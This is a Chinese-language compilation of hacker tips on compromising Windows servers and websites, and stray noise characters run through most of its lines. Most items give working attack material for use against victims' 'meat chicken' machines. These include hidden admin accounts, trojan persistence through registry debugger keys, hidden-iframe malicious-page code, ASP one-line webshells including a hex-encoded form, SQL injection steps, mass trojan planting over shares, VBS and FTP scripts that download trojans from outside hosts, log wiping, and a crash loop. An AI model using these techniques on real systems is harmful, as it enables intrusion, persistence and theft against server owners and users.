1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,) |3 y4 r7 r: q6 I
cacls C:\windows\system32 /G hqw20:R
* o! Y {8 t. W思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入- p4 ]% n! ~. A& f# v. h3 _7 p. w
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F m# A+ J. z: A7 ^, B) y H
' v3 ?, o2 r/ @0 o/ P
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
) Q7 k7 h0 x$ ], w( a# G* R+ b
5 b9 ?6 t3 m8 Y) R3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
8 T. ]* N9 }8 e( l- K
3 G3 J- t& t1 T0 w* Z3 k e4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
' @. @* ?" Y' X, L8 o! j; g; e# L7 O1 K* Z" ?* s
5、利用INF文件来修改注册表
+ Q) x' T9 u" |& c$ V[Version]
( z; G C; u: OSignature="$CHICAGO$"
) f4 S# S' ?+ K5 c6 T! v[Defaultinstall]# g" ^; R' I" b D \
addREG=Ating8 s& Q+ Q5 A3 M9 q. s( e: C% A
[Ating]! J, W% B0 `* b5 L8 ?- a# w1 \
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"6 U" Y7 @5 g0 d- R1 M p, }
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:, C7 ]; O) Z) w3 Y6 x
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径- S. d& g/ [# ?1 b( X
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU/ H8 D* \" t( m. O- f- u: P
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU" R- ^. t+ D9 J& W3 t4 I+ @6 K
HKEY_CURRENT_CONFIG 简写为 HKCC" v) Y7 M8 g/ D
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值3 @* V9 Q( t& \- |6 c- D f
"1"这里代表是写入或删除注册表键值中的具体数据
) B5 x& C. Q' ~# l1 @% G( L( p) j" b( |
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,, A1 `2 K( Z. @+ o J
多了一步就是在防火墙里添加个端口,然后导出其键值
% y4 H2 k* ^6 Y[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]+ \7 o" G/ r. k+ | Q- U2 Y: {% x
0 X p5 Z0 L* k. G4 b7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
3 e/ s- Z6 t3 G在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。3 m; U* t6 x0 Y/ A: r
: T& w; N* @- K; g2 ], e! {5 P
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。. R6 |$ C7 Q- W, C l0 t. Z: B
. T/ X; Q/ g: R. s! _. B
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,0 y$ `+ q6 H: }3 O4 m) v: w! s
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。9 _! f4 Y6 P0 T
& m3 \* n4 j3 E* w \10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”" M( y. X' F7 T& N: O% [- C n
8 l6 E, ^6 b/ M% d11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) j6 f N3 e# s2 ]- W# r用法:xsniff –pass –hide –log pass.txt
( ]2 K# k5 `; \$ T3 ~
% S) w. |/ m0 W1 R6 S: q12、google搜索的艺术4 t( p) d3 r3 U% E5 d8 b. }
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”8 Y3 s0 m+ [- U* s8 K& J
或“字符串的语法错误”可以找到很多sql注入漏洞。
+ ~8 F- D9 z$ Y( s( ^
P$ _3 G" r, h& n7 V3 q& O13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ ~( w; l& O5 @
" v- q* V: o8 q$ R14、cmd中输入 nc –vv –l –p 1987
5 q' S* n* `, T$ a做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃: M3 V$ q, ?) o) I3 }& {- j
5 d- v) Y1 f) z9 D' z7 u8 m: j
15、制作T++木马,先写个ating.hta文件,内容为
2 d4 K" |9 X, S+ g& q" o8 Z# o<script language="VBScript">0 I: S, |( N# i# ?) T
set wshshell=createobject ("wscript.shell" )
" z9 N( h0 \; ^! A ra=wshshell.run("你马的名称",1)
0 ~6 Y2 x* q" G w3 wwindow.close; H$ e- k5 f8 I2 u0 |
</script># f: \: A" ]5 Z' M0 C5 o8 i
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。* f. W. {. V6 h5 E' R$ B
8 H) o* w8 [+ @; z16、搜索栏里输入, I7 O- z9 x- V7 k" H- M& {
关键字%'and 1=1 and '%'='6 o2 [0 o8 |, ]( S
关键字%'and 1=2 and '%'='
9 F5 Z' @6 | o; u8 u7 d9 m比较不同处 可以作为注入的特征字符
: z. D+ r; p8 [ k% k3 Z. @3 t
( S2 A4 }8 j" X17、挂马代码<html>$ @) M' q! h' W
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe># Q; p6 V8 x1 V0 D8 R8 K! N
</html>! U' s& a1 N* A4 b% l
8 Z* U+ @# ^8 B! L2 f7 k18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
$ ^: |% A' e. Y% J7 Unet localgroup administrators还是可以看出Guest是管理员来。
0 q0 G7 J# H0 V7 i1 X! w1 a9 l
8 K& V% v9 @, W9 ]4 _1 f19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
, ]- v3 g2 ]3 E* e* Y用法: 安装: instsrv.exe 服务名称 路径
& C2 n: P# q0 a5 \卸载: instsrv.exe 服务名称 REMOVE1 s8 h, {+ R# }5 ]1 {+ g; W
, l0 c6 b) b9 Y! ]' C8 K6 s" n7 r5 \+ ^9 ]
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉( k2 V; F' U @: M% E5 [5 R
不能注入时要第一时间想到%5c暴库。1 n7 K: R4 g3 |! B: Q
9 H; X, O6 Y1 [2 d- F22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
7 ]' T6 z* T" K: D1 @7 q4 }- w6 N7 n$ I. i/ a8 j
23、缺少xp_cmdshell时, f. g7 L8 `# Y$ c# _
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
. q; h/ W( |4 M1 {假如恢复不成功,可以尝试直接加用户(针对开3389的)( k1 P* r- y- R8 _ p9 B8 Z
declare @o int
! ?/ x' z1 G4 o9 bexec sp_oacreate 'wscript.shell',@o out
7 P+ {; p7 @: Z3 E7 s. h2 _exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
: {- p9 _3 g7 k7 |* c- K
1 ?9 a5 I6 c& X. y2 t! \24.批量种植木马.bat$ C+ l' |" \5 c
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
9 f$ D; b* S, ]( `9 F- Mfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
1 ], ~2 \" Z* m扫描地址.txt里每个主机名一行 用\\开头
3 K9 g& k% p& ^% Y x
_+ x) m- R4 v- C& f* D3 H- l25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
5 X8 y4 f( A9 {! h, J
+ s, i: y) _8 o7 s# K7 [26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
0 o1 D- i! _4 h9 N% W0 s将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
- O. |: l. w/ U k F.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
+ ^% w1 r$ s8 t) h1 y0 a; j4 y# D0 L7 R" x
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP( W( Y8 C% T% R1 s2 q/ [" ?6 s3 \2 c
然后用#clear logg和#clear line vty *删除日志5 E0 E( D: N1 q# {
D3 Q% t! J. B28、电脑坏了省去重新安装系统的方法
3 {# c1 P+ z9 i$ d" O3 w2 I% c5 v& q纯dos下执行,6 Z" W9 k; i; _3 J1 q
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config! F" ^1 }" @) I$ X# R$ m/ \
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config5 i8 l1 \2 `" S$ Z& s
; T1 L0 Y% f m0 I5 J: U) z) X3 [% [29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 A, j7 o$ W- Z; L! W, cHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
% t7 W" H% k& n. xHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip- J1 Y" q, G& S- e9 W% b
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 L7 U3 q* e+ J7 B8 k
分别用
7 r0 _. F) w5 a- S% ~: K6 uregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ D/ x. C/ @4 z( Q/ R
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 z9 I F0 i7 Z7 B3 o" D5 cregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 L& Y6 z; w* u3 E4 M8 `命令来导出注册表项- |! m$ E% X% \
然后把三个文件里的EnableSecurityFilters"=dword:00000001,% `& A) `% \3 V+ X- j# E' n, Q
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
+ e N0 W7 @6 z/ xregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。. d* \; M- n; p
5 A/ H3 l6 f* M7 g) n0 A: ?30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
) y; E+ Z1 g: f) o8 fSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3' T0 J+ @+ ?7 g4 W) S
1 C- t# L& V* A, ^( {31、全手工打造开3389工具
& ?6 p& k8 _- G; U! J# d8 R' S6 R打开记事本,编辑内容如下:1 Y9 \& |& d. f# X; a
echo [Components] > c:\sql, C7 @ Y0 n! ]4 I$ ~3 {+ s6 |" g( n% P
echo TSEnable = on >> c:\sql
4 } u& N" R8 osysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
# i3 ^ R( p1 E$ ]5 [9 b! G编辑好后存为BAT文件,上传至肉鸡,执行
; W5 {! K' Y+ e* R+ ?
# n* Z4 L3 `- I7 Z0 H# a2 c32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
6 _" U- p6 l3 u8 B; `1 d2 ]
- L7 \( P/ t2 R* Y. Y1 f0 [33、让服务器重启+ f. Q4 {- |! v: h b6 Z$ S
写个bat死循环:
4 e3 K, j2 M1 L4 N% }/ O@echo off
# m' D/ D1 A, O. `9 f. m" \:loop1. y. _% f: N w8 t/ \, q7 [) e/ X
cls
" W2 p& @5 L1 |3 @start cmd.exe5 |2 H: A2 D# k
goto loop1) k9 _" Z6 a i) C# J6 t# O
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
6 ^8 ?* P) \# w* a- ]! d
5 x: j7 |: l; w) j) U8 T6 P34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
! G8 j. _7 }$ V Z0 b. ]% D7 S@echo off. V9 Q- J) Q n \( u# g9 a
date /t >c:/3389.txt( \ I0 b1 I$ O4 a
time /t >>c:/3389.txt+ V( Y* G; u3 b8 j/ u+ t' w# o6 ?, C
attrib +s +h c:/3389.bat
3 n8 K1 Y$ P# m$ t: U& `& P: Qattrib +s +h c:/3389.txt6 P. J! X8 [/ Q" D9 _8 [
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt$ Y8 \! Y6 _3 t! R. R
并保存为3389.bat
+ |$ p* K' _( Y4 S打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号9 e6 \. F8 P5 a8 c1 n% s( j
d- ]) H& K z8 h6 [
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
2 l9 b. q3 V N; F7 f7 d4 j! S9 Ystart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)+ D7 G( `# l% F5 R
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
! M- |0 e* @# D) J" r+ u- x
+ a4 D4 N: P' u K# N9 M1 [2 p4 M36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件; I) M4 t/ t/ N0 J" u3 K
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 B4 J0 l: E4 l2 L- ~; Secho 你的FTP账号 >>c:\1.bat //输入账号
. V8 [- c& y' s5 ^8 oecho 你的FTP密码 >>c:\1.bat //输入密码) k+ E0 q, v' p% G" d
echo bin >>c:\1.bat //登入6 ~/ ^/ c' d/ ]
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
# l( k" ]' ?4 L4 c( s0 T) qecho bye >>c:\1.bat //退出* p" c) s- E: @- \9 T& i
然后执行ftp -s:c:\1.bat即可
5 Q/ L! x/ B ]: i. M1 |# G2 Q0 p( O
37、修改注册表开3389两法
4 D. U( P8 I; j" u5 y" {8 f: o(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
6 A! g2 i+ Q7 W8 M+ X; Z. Cecho Windows Registry Editor Version 5.00 >>3389.reg
% q* T- d9 z0 t# M' v* n* Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
7 a1 o m: Z: \; Kecho "Enabled"="0" >>3389.reg
: |5 \5 I {) h9 f$ | }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows+ G& A6 y+ q( ~- N L( u5 F
NT\CurrentVersion\Winlogon] >>3389.reg
0 m0 a: V4 v1 S7 o( pecho "ShutdownWithoutLogon"="0" >>3389.reg& V% q/ ~" [! z; G" B* I7 j4 ]
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
, r5 F, c9 U( E0 T, }! K2 o>>3389.reg
3 ^2 S* W% p. @3 cecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg0 N0 V" ^& ?# }9 _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
- h( J$ _* M. s6 x3 r# A/ C5 V>>3389.reg
) K. G8 m# \% ~' Iecho "TSEnabled"=dword:00000001 >>3389.reg2 E! n+ h+ E! V6 V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' Z9 K# G* y, C* x, L z- R
echo "Start"=dword:00000002 >>3389.reg
- l% p C( ~0 T" V9 becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]! \, k: W' `1 B8 d# Y9 u' H
>>3389.reg
. O. Z9 f% N) F: Mecho "Start"=dword:00000002 >>3389.reg
0 X% s5 }2 ^* Recho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
' b8 l0 |! u# _; K1 Y3 ^" Necho "Hotkey"="1" >>3389.reg+ g" h7 L$ s6 [+ R; N5 u% U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 v4 I* R7 n0 |/ p4 J
Server\Wds\rdpwd\Tds\tcp] >>3389.reg! C( T3 A1 m' u
echo "PortNumber"=dword:00000D3D >>3389.reg
2 f3 ?# b( @5 h: @% Q3 |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 E0 v5 F- J3 J- E) {7 R
Server\WinStations\RDP-Tcp] >>3389.reg
9 W9 i% O/ u" T; i* techo "PortNumber"=dword:00000D3D >>3389.reg
1 g6 j' O; ]1 _0 X) N+ [( K把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。+ j8 u3 X7 s8 B
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)6 b7 J/ V# o& w, {! B
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
. p1 m" o/ \0 M( r(2)winxp和win2003终端开启
2 @2 o! Y7 u0 L9 P, t5 e [用以下ECHO代码写一个REG文件:
}/ D4 D) ~, I: ?7 E' d6 u4 hecho Windows Registry Editor Version 5.00>>3389.reg; j$ l- L$ s, I5 C& Y4 i6 X) r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 K, R% [& S E( U; _7 HServer]>>3389.reg4 [ I9 H' r/ v& P( i1 C# Q
echo "fDenyTSConnections"=dword:00000000>>3389.reg
! X. N( s; g, y; ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 K5 f, p0 M2 b! `* wServer\Wds\rdpwd\Tds\tcp]>>3389.reg. t5 ^& s+ H; O
echo "PortNumber"=dword:00000d3d>>3389.reg
?' T0 Y( M, P3 C! techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 M' U. ?# t# N2 e
Server\WinStations\RDP-Tcp]>>3389.reg
( Y- R" P2 W+ {, r. k: Decho "PortNumber"=dword:00000d3d>>3389.reg: D' L. ~4 d. O: G# O) O
然后regedit /s 3389.reg del 3389.reg
& o6 x+ G0 A l) Q+ S& i p- S7 w% ]XP下不论开终端还是改终端端口都不需重启' w% H- N, N8 a0 V' `
+ b4 d- P; l: j) k; s
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
$ r; K7 S& o) a. v' Q/ e6 P k6 K用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
0 s& [. x! i! G R: C& c/ X+ t8 ~! X' Q. z' o3 C* D" [, z% h! U
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- g- _ L) w- K+ L. i
(1)数据库文件名应复杂并要有特殊字符
. h M. x0 v% J, J1 h% x& O# x$ k(2)不要把数据库名称写在conn.asp里,要用ODBC数据源, j& X+ G- x* v& ^1 l$ z% w$ N7 k
将conn.asp文档中的
$ N" p: p" O/ x# BDBPath = Server.MapPath("数据库.mdb")" e7 h7 ^. d; N2 V8 M% ]* m& R
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath9 e& q5 N7 I A& I& O4 w
/ X" b: H8 K- Y
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
S9 N- w7 [/ X0 J; `(3)不放在WEB目录里4 @! M7 o! A: r" V" u1 X4 Y
, {# x1 O7 c( X3 n) Z8 a
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉# X5 `9 _8 e$ S$ z* n+ [
可以写两个bat文件& b' U/ e) @/ h( x; b
@echo off, }2 Q: q! u* s1 Y, J2 F& C$ a
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
% r3 }3 D& `% H/ V1 u Z4 R! ]5 `@del c:\winnt\system32\query.exe
1 Z/ m/ X6 U1 M4 B$ r@del %SYSTEMROOT%\system32\dllcache\query.exe
: P; F9 N# i3 n2 x5 M5 T@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的' Y" W2 b3 \& ?6 t6 V+ A f ^; g
2 r3 C) Q4 K5 X- x) N@echo off7 k0 G7 Y: f ` ^* b& _- s/ i5 u
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe" s7 r( f) v6 o
@del c:\winnt\system32\tsadmin.exe
% P; m9 F; [& x) s( Y6 P1 {; B4 ?@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
$ d$ A% ?, b3 O& A' [
5 Z l% e% n/ [( w7 D: j% Y41、映射对方盘符/ H6 n5 P1 V1 n6 y. Q* J( y+ `; E7 ^
telnet到他的机器上," H! y9 G" i& L* w4 t
net share 查看有没有默认共享 如果没有,那么就接着运行
( X1 S' O9 x4 ~. l6 i5 m/ Nnet share c$=c:
' t/ j# V; ^: U8 M; V3 w0 m/ jnet share现在有c$
. x) x, N# U5 f- }- Y3 [; g0 L! @在自己的机器上运行0 C' N$ b' s' O" q
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
6 h& o, _4 c8 k9 }0 K
- Z2 `) }5 p# P# M42、一些很有用的老知识8 v, `6 x5 R3 u% |
type c:\boot.ini ( 查看系统版本 )
- e, ^" m* \4 ?) K2 X; i4 X6 c4 Rnet start (查看已经启动的服务)
_+ { H& s6 ]1 I3 s7 Vquery user ( 查看当前终端连接 )
+ n0 R: p1 [/ w" m% H pnet user ( 查看当前用户 )
. x' d) c! Y: @/ onet user 用户 密码/add ( 建立账号 )
7 A# X' X& \9 y) R: nnet localgroup administrators 用户 /add (提升某用户为管理员)
h1 U% P0 |$ `) v6 W, L1 oipconfig -all ( 查看IP什么的 )
+ S4 M6 y V8 f8 @/ s' u7 Pnetstat -an ( 查看当前网络状态 )$ l# j: h- A3 \& J
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)& S2 h2 q3 s7 h a. G. N, W
克隆时Administrator对应1F45 g& X8 |) U. `5 y8 C+ l
guest对应1F59 x0 ^' k h; r, B7 q
tsinternetuser对应3E8
! d, n" {! c7 G. R
& N, b6 K5 ]; t% f% L9 X43、如果对方没开3389,但是装了Remote Administrator Service: z; o, D; T O: ` H4 Q/ b
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
/ j* J1 N3 c' b: I' G/ }* I解释:用serv-u漏洞导入自己配制好的radmin的注册表信息 x$ A# I( X" @; b
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin": b( s2 K+ w. o
/ c6 f4 V# |! X- u& M) \$ q4 i4 _
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)$ Q' E1 W; v( `( D
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)+ c" E% Q3 }1 L- H+ S# _/ B
9 l4 }0 E/ _& q( E
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)/ `; h% @. h4 r0 H
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
9 n' X* O& S+ M ^1 @2 s^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =# j! W7 d4 E9 w' D b' B" P7 W
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
4 I; Y7 D% E% x4 @1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs; y& B" L7 F5 p: c, q
(这是完整的一句话,其中没有换行符)
6 \3 E% M i: g( H& X然后下载:
( J/ c: E- r9 `! P: W+ tcscript down.vbs http://www.hack520.org/hack.exe hack.exe+ U: D6 ^- P# v3 y7 R) o
5 s! q: D. D1 s* e1 @6 J# F46、一句话木马成功依赖于两个条件:- w& Q" o) W0 U6 ?/ p2 {. j
1、服务端没有禁止adodb.Stream或FSO组件: R, Y% s- f. u9 E, v( _, h; S
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
. u, w" o" [& D6 h6 \; s5 J/ H0 ]
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
% z% U7 }9 M" c: p) } o;alter database utsz set RECOVERY FULL--
\/ q* |7 a; ~: p" A7 y1 w N8 |;create table cmd (a image)--
: `, }( n, m! M) [3 B* O;backup log utsz to disk = 'D:\cmd' with init--
$ r, k0 }+ i7 E- o6 g/ V;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--/ \/ F$ W8 E! ~7 Q% }
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
5 n! N; S7 @3 G. N% {, ?注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
5 K2 z9 q. k1 ^" w+ s2 k$ A& o3 Q# w8 M0 n. z3 M8 G
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
9 D5 P: ?" G, |
2 p* H* o+ c) d/ _: `) _用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
" D# F t6 h7 o所有会话用 'all'。$ t; s3 P8 I$ T% J r
-s sessionid 列出会话的信息。
4 E. ~- m# U: e; V% j-k sessionid 终止会话。3 O1 C* X7 z& |; p* |* Q* `0 T+ F4 H
-m sessionid 发送消息到会话。' u7 ~: J0 Y# s5 S
4 b; m3 |# U8 G: b7 E. u) r3 bconfig 配置 telnet 服务器参数。
8 G# G5 P- p# ] n1 L0 `7 u3 y
2 q: P' l' p# u" I6 acommon_options 为:
f! }* H- q y$ _2 C-u user 指定要使用其凭据的用户
9 ]; E, X( l {, m4 C b-p password 用户密码) ~* K! P2 Y# G8 T& k
. t2 k3 C# Y$ X2 Q7 J+ ]
config_options 为:
/ q1 P8 z3 Q f: s+ g3 ?dom = domain 设定用户的默认域# M& V" f# { n
ctrlakeymap = yes|no 设定 ALT 键的映射
. A% a$ L4 N1 L! f4 htimeout = hh:mm:ss 设定空闲会话超时值
2 I9 t/ {$ ]( r. A b1 M" Etimeoutactive = yes|no 启用空闲会话。5 F7 t4 v0 A$ M4 r0 @
maxfail = attempts 设定断开前失败的登录企图数。
9 Z9 P9 S7 H3 [2 |! a; F8 `2 Dmaxconn = connections 设定最大连接数。- f5 y+ X" n C
port = number 设定 telnet 端口。& k) F0 y3 L7 }. u- S" I. R
sec = [+/-]NTLM [+/-]passwd
) T4 S" c/ H, W( i0 q' B% {设定身份验证机构- q. F$ H9 F x$ R8 Q
fname = file 指定审计文件名。1 B8 Z# {+ ~2 L- N/ @: Z ] g
fsize = size 指定审计文件的最大尺寸(MB)。' r. H7 f3 `+ B: y1 r+ G
mode = console|stream 指定操作模式。% s; T* c& s5 v+ a
auditlocation = eventlog|file|both8 |/ o/ m7 o4 x8 ?
指定记录地点
" e$ z' U5 G! Faudit = [+/-]user [+/-]fail [+/-]admin
# r6 E; x% S- i: m: i4 d# _/ e5 j1 \
49、例如:在IE上访问:
' [: C8 b7 m6 P7 e0 rwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
& {5 E: g6 ]7 T2 P, h# H; B6 |hack.txt里面的代码是:
8 b$ L' R" o/ Q: k6 v<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
5 o' M- Y) x+ t X% r* ~把这个hack.txt发到你空间就可以了!6 V) |5 `$ ^7 _& B+ e
这个可以利用来做网马哦!8 }, p9 w- J" G( N# ^( W
0 C. R( F( o2 ^) m3 k50、autorun的病毒可以通过手动限制!7 ]. [& D+ @( R8 e7 P8 _ {/ X3 F! M' [
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!6 n H: ~. ^0 Y Q9 Y* O3 q
2,打开盘符用右键打开!切忌双击盘符~
* N$ L" e8 y5 J- X6 n3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
: f- m4 e5 R: L( k" ]" L/ M @9 W
51、log备份时的一句话木马:
4 N& h/ j, u) x- E6 _+ ^, oa).<%%25Execute(request("go"))%%25>( G" B$ t. @& h) U4 B/ }9 {7 m* J
b).<%Execute(request("go"))%>
2 r# ?5 }! z& w7 n4 ^1 qc).%><%execute request("go")%><%
. W4 r$ C( Q+ o! `5 Y7 \d).<script language=VBScript runat=server>execute request("sb")</Script>
4 b; W) Y$ Y( C4 Y7 Ce).<%25Execute(request("l"))%25>0 \& K! W( D1 ~) n7 Z {
f).<%if request("cmd")<>"" then execute request("pass")%>
5 L6 l8 x/ S" P% _
7 ]8 S* G- ^' I: L52、at "12:17" /interactive cmd
* }) G e7 a( ]2 l* X& Y7 S3 T执行后可以用AT命令查看新加的任务2 _" p. t: u) R8 }' t; l' H3 \( b
